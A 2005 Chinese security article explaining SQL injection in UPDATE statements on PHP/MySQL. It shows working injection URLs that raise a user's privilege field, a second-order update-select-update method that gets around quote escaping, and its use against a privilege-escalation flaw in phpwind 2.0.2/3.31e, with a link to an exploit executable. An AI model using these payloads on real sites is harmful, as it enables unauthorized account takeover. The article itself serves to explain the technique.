文章性质:原创
发布日期:2005-08-14
一、测试环境
os: windowsxp sp2
php: php 4.3.10
mysql 4.1.9
apache 1.3.33
二、测试数据库结构
-- 数据库: `test`
--
-- --------------------------------------------------------
--
-- 表的结构 `userinfo`
--
create table `userinfo` (
`groudid` varchar(12) not null default '1',
`user` varchar(12) not null default 'heige',
`pass` varchar(122) not null default '123456'
) type=myisam;
--
-- 导出表中的数据 `userinfo`
--
insert into `userinfo` values ('2', 'heige', '123456')
三、测试模式
1、变量没有带''或
脚本里只是修改 user='heige' 的 pass,如果 groudid 表示用户的权限等级,我们的目的就是通过构造 $p 来达到修改 groupid 的目的,那么我们提交:
http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查询:
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.01 sec)
用户heige的groudid又2改为1了 :)
所以我们可以得到没有''或update的注射是可以成功的,这个就是我们的模式1。
2、变量带''或
为了关闭'我们构造$p应该为 123456',groudid='2 提交:
http://127.0.0.1/test2.php?p=123456',groudid='1
在gpc=on的情况下'变成了\',提交的语句变成:
sql query:update userinfo set pass='123456\',groudid=\'1' where user='heige'
mysql查询:
mysql> select * from userinfo;
+---------+-------+--------------------+
| groudid | user | pass |
+---------+-------+--------------------+
| 2 | heige | 123456',groudid='1 |
+---------+-------+--------------------+
1 row in set (0.00 sec)
groudid并没有被修改。那么在变量被''或时 就完全没有被注射呢?不是 下面我们看模式2:
我们测试下,提交:
http://127.0.0.1/test3.php?p=123456',groudid='1
回mysql查询下 :
mysql> select * from userinfo;
+---------+-------+--------+
| groudid | user | pass |
+---------+-------+--------+
| 1 | heige | 123456 |
+---------+-------+--------+
1 row in set (0.00 sec)
haha~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:
update --> select --> update
四、实际模式
模式1:缺
模式2:phpwind 2.0.2和3.31e 权限提升漏洞
漏洞分析
update (profile.php 注射变量为$proicon update语句里为,icon='$userdb[icon]')
↓
select (jop.php)
↓
updtate (jop.php)
exploit: http://www.huij.net/9xiao/up/phpwind-exploit.exe
五、鸣谢
特别感谢saiy等朋友的讨论和帮助。thanks!!
